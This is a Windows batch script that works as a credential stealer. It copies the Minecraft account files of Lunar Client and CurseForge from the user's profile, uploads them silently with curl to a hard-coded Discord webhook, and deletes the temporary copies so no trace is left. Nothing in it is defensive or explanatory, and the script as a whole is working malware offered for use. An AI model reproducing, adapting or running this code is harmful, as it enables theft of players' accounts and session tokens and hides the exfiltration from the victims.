@echo off
setlocal

set "WEBHOOK_URL=https://discord.com/api/webhooks/1466804187710099720/92f98uyLb5PNSbL9g53NPC914LmjV409aNKV_ORvPUFNTNQqZaX8UcmxauZs0qIuU4Ne"

:: Lunar Client Teil
set "JSON_PATH=%USERPROFILE%\.lunarclient\settings\game\accounts.json"
set "TXT_FILE=%TEMP%\accounts_%random%.txt"
if exist "%JSON_PATH%" (
    where curl >nul 2>&1
    if not errorlevel 1 (
        copy "%JSON_PATH%" "%TXT_FILE%" >nul 2>&1
        if exist "%TXT_FILE%" (
            curl -X POST -F "content=# Lunar Client" -F "file=@%TXT_FILE%" "%WEBHOOK_URL%" >nul 2>&1
            del "%TXT_FILE%" >nul 2>&1
        )
    )
)

:: CurseForge Teil
set "JSON_PATH=%USERPROFILE%\curseforge\minecraft\Install\launcher_accounts.json"
set "TXT_FILE=%TEMP%\accounts_%random%.txt"
if exist "%JSON_PATH%" (
    where curl >nul 2>&1
    if not errorlevel 1 (
        copy "%JSON_PATH%" "%TXT_FILE%" >nul 2>&1
        if exist "%TXT_FILE%" (
            curl -X POST -F "content=# CurseForge Launcher" -F "file=@%TXT_FILE%" "%WEBHOOK_URL%" >nul 2>&1
            del "%TXT_FILE%" >nul 2>&1
        )
    )
)

exit
